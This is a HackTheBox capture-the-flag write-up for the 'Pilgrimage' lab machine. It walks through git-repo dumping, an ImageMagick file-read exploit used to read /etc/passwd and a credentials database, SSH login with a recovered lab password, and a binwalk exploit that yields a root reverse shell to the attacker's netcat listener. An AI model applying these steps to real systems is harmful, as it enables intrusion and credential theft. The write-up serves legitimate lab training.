> For the complete documentation index, see [llms.txt](https://thamizhiniyancs.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://thamizhiniyancs.gitbook.io/writeups/hackthebox/machines/easy/pilgrimage.md).

# Pilgrimage

Pilgrimage writeup by Thamizhiniyan C S

## Overview

Greetings everyone,

In this write-up, we will tackle Pilgrimage from HackTheBox.

Machine link: [Pilgrimage](https://app.hackthebox.com/machines/Pilgrimage)

Difficulty Level: Easy

Let's Begin 🙌

Firstly, connect to the HTB server using the OpenVPN configuration file generated by HTB.  [Click Here](https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access) to learn more about how to connect to VPN and access the boxes.

Once connected to the VPN service, click on "Join Machine" to access the machine's IP.

Upon joining the machine, you will be able to view the IP address of the target machine.

***

## Reconnaissance

### Rustscan

`rustscan -a 10.10.11.219 -- -A`

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FVIoUZGOp7TBxJ21agv4o%2FUntitled.png?alt=media&amp;token=9c0bbbf1-6f41-40e0-b8e6-2893e4fbada2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2F9pF5PSAF1btF9ZRQqSvo%2FUntitled%201.png?alt=media&amp;token=a249c217-eb8e-49ff-b4f5-578114a35795" alt=""><figcaption></figcaption></figure>

### Nmap Default Scripts

`nmap -sC -p 22,80 10.10.11.219`

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FReJ1A6q3612wcEneBg1i%2FUntitled%202.png?alt=media&amp;token=54892f0b-bf90-4233-a1ed-045bb6d4fac6" alt=""><figcaption></figcaption></figure>

### Results

From the output of `rustscan` , we can devise that the two open ports found:

| Port | Service |
| ---- | ------- |
| 22   | SSH     |
| 80   | HTTP    |

From the results of the default scripts, we have found a git repository.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FPJMg462nFQGTj1xcnRkz%2FUntitled%203.png?alt=media&amp;token=f523d7cd-3ebe-4dc5-85ed-f7afa6a05ec8" alt=""><figcaption></figcaption></figure>

***

## Information Gathering - Git Repository

Now we can dump this git repository using the tool `git-dumper`.

You can install `git-dumper` using following steps:

* First create a python virtual environment using the command `python3 -m venv env`.
* Next activate the virtual environment using the command `source ./env/bin/activate`.
* Now install `git-dumper` using `pip3 install git-dumper`.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FF7mITDQzzjF2nWlAv2K2%2FUntitled%204.png?alt=media&amp;token=ce4d7943-4100-487a-9554-e241a9f8e474" alt=""><figcaption></figcaption></figure>

Now its time to dump the git repository.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FhacuWXquJBnPLo1nB81X%2FUntitled%205.png?alt=media&amp;token=abab11cf-dac8-4970-a9b5-4c6cc86f7265" alt=""><figcaption></figcaption></figure>

When I tried to dump the website using the IP address, the request get’s redirected. So I visited the website on port 80.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2F1y2TG0ZmzWiFZasIzBYG%2FUntitled%206.png?alt=media&amp;token=3116792c-69d8-400d-aaf9-0d1183c3b252" alt=""><figcaption></figcaption></figure>

The website gets redirected to `pilgrimage.htb`. To visit the website we have add this domain to our machines `hosts` file. Open `/etc/hosts` file with root permissions with your favourite text editor and add the following: `10.10.11.219 pilgrimage.htb`and save the file.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FaS3L7AgJ5AS3eAbLh8gK%2FUntitled%207.png?alt=media&amp;token=7d03e3b5-5564-4ab9-85ea-01008106ad58" alt=""><figcaption></figcaption></figure>

Now reload the website.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FCZ3oJMKjvv4SpatGfa4x%2FUntitled%208.png?alt=media&amp;token=11816117-d57d-4d43-bc4f-a8a7190cf3e5" alt=""><figcaption></figcaption></figure>

You can see the website now opens. Let’s try `git-dumper` using the domain name.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FJ46xmaDpSgfqurp4DTqM%2FUntitled%209.png?alt=media&amp;token=4534db0e-28cd-40b9-8ff5-fc3d0a439948" alt=""><figcaption></figcaption></figure>

And it worked. After the dump is completed, I opened the entire project folder in vscode to view the code.

I checked the `login.php` and `register.php`, was looking out for SQL injection vulnerabilities but, didn’t found anything. Next I checked the `index.php` page and found that the website uses `magick` tool to resize the images.

***

## Initial Access

I checked the `magick` tool version and found the version.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FpBuQxrE0ZtaDELkwH1wf%2FUntitled%2010.png?alt=media&amp;token=3d10bbd8-4e2e-4948-8e5d-7b94332fcb9d" alt=""><figcaption></figcaption></figure>

I googled out for this version and found this vulnerability: <https://www.exploit-db.com/exploits/51261>.

From the above link found the proof of concept : <https://github.com/voidz0r/CVE-2022-44268>.

To exploit this vulnerability, first I cloned the proof of concept repository.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FVs3yKRiBYLIyHd84xf8Y%2FUntitled%2011.png?alt=media&amp;token=e960c041-fdda-436e-ae2d-2489bedfde7e" alt=""><figcaption></figcaption></figure>

Next I installed `rust` to run the downloaded tool using the command: `curl https://sh.rustup.rs -sSf | sh`. After installing `rust` run the following command to use cargo: `source ~/.cargo/env`.

Now run the tool and exploit the LFI vulnerability, first try to read the `/etc/passwd` file.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FwKHCuC6BSJBN0xn4Ap0d%2FUntitled%2012.png?alt=media&amp;token=83f26991-d52b-49aa-acb8-ed3277e357d3" alt=""><figcaption></figcaption></figure>

Next upload the create `image.png` to the website to shrink it. After shrinking copy the resized image URL.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2F93PqYtzjdAO2jOR6nF7h%2FUntitled%2013.png?alt=media&amp;token=032c2823-95fc-4b71-bd50-92b3c2de2d12" alt=""><figcaption></figcaption></figure>

Next download the resized image.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FrOfE8ELy06rn4aeXTaOP%2FUntitled%2014.png?alt=media&amp;token=6ba368ed-08d2-487c-ab78-af242721f077" alt=""><figcaption></figcaption></figure>

Now view the raw content of the downloaded image using the `magick` tools `identify` utility. Use the same `magick` tool, that we got from the git dump.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FpSugWsfs6TEpVvJ5AgPi%2FUntitled%2015.png?alt=media&amp;token=1e68a710-1af5-45e4-9005-004f0de8347d" alt=""><figcaption></figcaption></figure>

Scroll down to get the raw hex version of the embedded details of the `/etc/passwd` file from the target machine.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FqjnpIsqC6WpBUDpzvvcY%2FUntitled%2016.png?alt=media&amp;token=1cd71a97-7aaa-4f0c-9e89-9633c3e00864" alt=""><figcaption></figcaption></figure>

Copy the above block of hex code and put it in <https://gchq.github.io/CyberChef/>, and use the ingredient named `From Hex`.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FuYyXUlBBd5e72MR6SeAy%2FUntitled%2017.png?alt=media&amp;token=711a82ae-6ea3-446f-b7d7-d92d36fb4224" alt=""><figcaption></figcaption></figure>

From the decode text, we have found a user named `emily` on the target machine.

If you check the `register.php` page that we got from the git dump, you can see that the database connection is made by using a db file `/var/db/pilgrimage`.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2Ffs5oOsMzDlUjGWpQ1ExA%2FUntitled%2018.png?alt=media&amp;token=10feda05-d163-47ad-a651-ddde442fab04" alt=""><figcaption></figcaption></figure>

Now, this time instead of reading `/etc/passwd` file, we can try to read the `/var/db/pilgrimage` file. Now create the payload image.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FEQ3g3Q1YWHWXZsFiURHO%2FUntitled%2019.png?alt=media&amp;token=69fd9e30-2061-4043-8a5e-87aeac755d39" alt=""><figcaption></figcaption></figure>

Next upload the payload image and download the resized image.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FfqKE02y1fhgXsVz8sBx0%2FUntitled%2020.png?alt=media&amp;token=938b088b-b915-46fe-b167-866457dd0ef0" alt=""><figcaption></figcaption></figure>

Now view the raw content of the image. I piped the output to vscode, since the output has more lines which I can’t able to copy from the terminal.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FTkM79JQbL1uZ3lioTCc1%2FUntitled%2021.png?alt=media&amp;token=20dcdfca-155e-4b07-b532-43bfab80ff9c" alt=""><figcaption></figcaption></figure>

Now copy the raw content and put it in cyber chef.

Since the output is sqlite db file, I downloaded the output using the download option, and opened it in a sqlite db viewer.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FF7sEAGyCM7d9gXM1fPZ7%2F2023-09-05_19-51.png?alt=media&amp;token=b2e8c667-bc3e-4210-9e3a-feb61dc66337" alt=""><figcaption></figcaption></figure>

After decoding and downloading the file, go to <https://sqliteviewer.app/> and upload the downloaded file to view the contents of the db.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FRCLEaM2pGktqiLhiSfYi%2FUntitled%2022.png?alt=media&amp;token=86b0a0ac-9b28-41b8-b202-15fbe4540d88" alt=""><figcaption></figcaption></figure>

We have found a credential, `emily:abigchonkyboi123`.

***

## Getting the User Flag

Now we have got a password for `emily`. let’s try to ssh to the target machine using the above credentials.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FWehl8MoM6q9cMNO8ofmK%2FUntitled%2023.png?alt=media&amp;token=4343e926-2ca5-42fc-bc1b-33b915062b95" alt=""><figcaption></figcaption></figure>

We have successfully found the user flag. Next we have to escalate our privileges to read the root flag.

***

## Privilege Escalation

I started looking out for some common Privilege Escalation vectors, such as files with SUID bit, commands that we can execute as sudo and also checked for NFS shares.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FzELS9TRodN27EAR6r0oj%2FUntitled%2024.png?alt=media&amp;token=0c49ed3e-2c97-4129-8538-6660177dd0e8" alt=""><figcaption></figcaption></figure>

And also looked out for cron jobs, but found nothing interesting.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FcjSnkZxAEX4eIi1r9RSP%2FUntitled%2025.png?alt=media&amp;token=0a58d8c2-a68a-4a52-a22d-a36fcd709fa8" alt=""><figcaption></figcaption></figure>

Next, I used `PsPy` \[ <https://github.com/DominicBreuker/pspy/releases/> ] tool to check out for active processes.

Since, out target machine doesn’t have a internet connection, we have to move it from our local machine to the target machine. For that first we have to download pspy on our local machine.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FM1btXQemN770MU1by7IM%2FUntitled%2026.png?alt=media&amp;token=5759ebfc-da37-45d2-a948-202e00eb0128" alt=""><figcaption></figcaption></figure>

After downloading pspy, its time to move it to the target machine.

Start a simple python http server on our local machine in the same directory where the pspy tool is located.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2F5eu8o1h0aHQWhicNxz0r%2FUntitled%2027.png?alt=media&amp;token=e764e59f-88cb-4c99-91be-aa7045f42d7e" alt=""><figcaption></figcaption></figure>

Now in the target machine, download the tool using `wget`.

Command: `wget http://<LocalMachine_tun0_IP>/pspy64`

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FV1zYJ0PjPW2U3xMMNcRe%2FUntitled%2028.png?alt=media&amp;token=1c489dd4-c139-4a69-93b1-0f182c0c9989" alt=""><figcaption></figcaption></figure>

After downloading the tool, give it executable permission.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2Fs77165UbPI9LAxpYT1TK%2FUntitled%2029.png?alt=media&amp;token=d99095f6-87fe-49ee-9afe-866f1fc18ec6" alt=""><figcaption></figcaption></figure>

Now run the tool.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FfUcYvaxqAVtJXRAh6KVK%2FUntitled%2030.png?alt=media&amp;token=dc3a77d9-4ce1-4227-9fd6-2af7b9a521be" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FK8SJ7aop2MYKo4aXdATD%2FUntitled%2031.png?alt=media&amp;token=e237ea60-40b0-499a-bb14-7f1dea062139" alt=""><figcaption></figcaption></figure>

From the output of pspy, we can see a shell script named `malwarescan.sh`, which is located at `/usr/sbin/malwarescan.sh`, which has a UID of 0, which means it is executed with root permission.

I tried to view the contents of the file.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FGSMx3rBJ7A30FZ4fYWAa%2FUntitled%2032.png?alt=media&amp;token=c1276b69-f62b-4831-96b0-68dd541a897c" alt=""><figcaption></figcaption></figure>

The contains a simple bash script, which actively checks the `/var/www/pilgrimage` directory for new files, looking out for `Executable script` and `Microsoft executable`, and removes them if it finds. It uses the `binwalk` tool, located at `/usr/local/bin/binwalk`, to perform the check.

I checked the version of `binwalk` and googled about that particular version.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FTZWOERlwuiXucQCL6YEI%2FUntitled%2033.png?alt=media&amp;token=13b4b311-dc74-4cb2-ae07-54b7ac1d5f9d" alt=""><figcaption></figcaption></figure>

I found this: <https://www.exploit-db.com/exploits/51249>. From this we came to know that the binwalk tool is vulnerable to Remote Code Execution.

To exploit this vulnerability, first I downloaded the exploit in my local machine:

Command: `wget https://www.exploit-db.com/download/51249`.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FdaqQ71b6IqRXR3cHLitk%2FUntitled%2034.png?alt=media&amp;token=1282e72a-17c2-48bd-a306-b512a0260ad1" alt=""><figcaption></figcaption></figure>

After downloading, run the exploit.

If you check the source code of the exploit, we can see that it expects three arguments.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FaVxyHG0mBanoILqSVCrp%2FUntitled%2035.png?alt=media&amp;token=db150ea8-c9cc-4c42-a19d-d22a8618e084" alt=""><figcaption></figcaption></figure>

It first expects a image file with `png` extension \[ Any image of type PNG of your choice ], next it expects the IP address and PORT for the netcat listener, that we will be setting up in our local machine, to get a reverse shell back.

Now with all the requirements run the exploit.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FBEZsGbNiwgmYPhEOpd8y%2FUntitled%2036.png?alt=media&amp;token=3a8098e3-5e33-434b-8fb6-2c18ead111b0" alt=""><figcaption></figcaption></figure>

Now we have got the payload ready. Its time to move this payload to the target machine. Start the http server and download the payload to the target machine.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FYiGycHErTy6A8wlldyVR%2FUntitled%2037.png?alt=media&amp;token=2e109fd2-1ed0-4452-b93d-6fad4e3375fb" alt=""><figcaption></figcaption></figure>

Now start a netcat listener on port 8080 on your local machine.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FeARfrTHTg8StAWSzimQQ%2FUntitled%2038.png?alt=media&amp;token=d11c4e5d-3781-4fcc-a3bb-4fc224be84ca" alt=""><figcaption></figcaption></figure>

After downloading the payload on the target machine, move the payload to `/var/www/pilgrimage.htb/shrunk/` directory, since the `malwarescan.sh` script actively checks that location for changes.

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2FIwJ4lhi6NYY79VUoVi1z%2FUntitled%2039.png?alt=media&amp;token=34a7919a-2e28-4bf1-bb14-a95c935960d4" alt=""><figcaption></figcaption></figure>

After moving the file, check your netcat listener.

***

## Getting the Root Flag

<figure><img src="https://3766366075-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FmgBRtrRN7KBbA6FISaV1%2Fuploads%2F9vOTPnIpZhsT3L3k0VJ9%2FUntitled%2040.png?alt=media&amp;token=127cac7d-2626-47c8-b4bd-083050e3eb8a" alt=""><figcaption></figcaption></figure>

We have successfully got the connection back and escalated our privileges as root, also got the root flag successfully.

Thank You……..
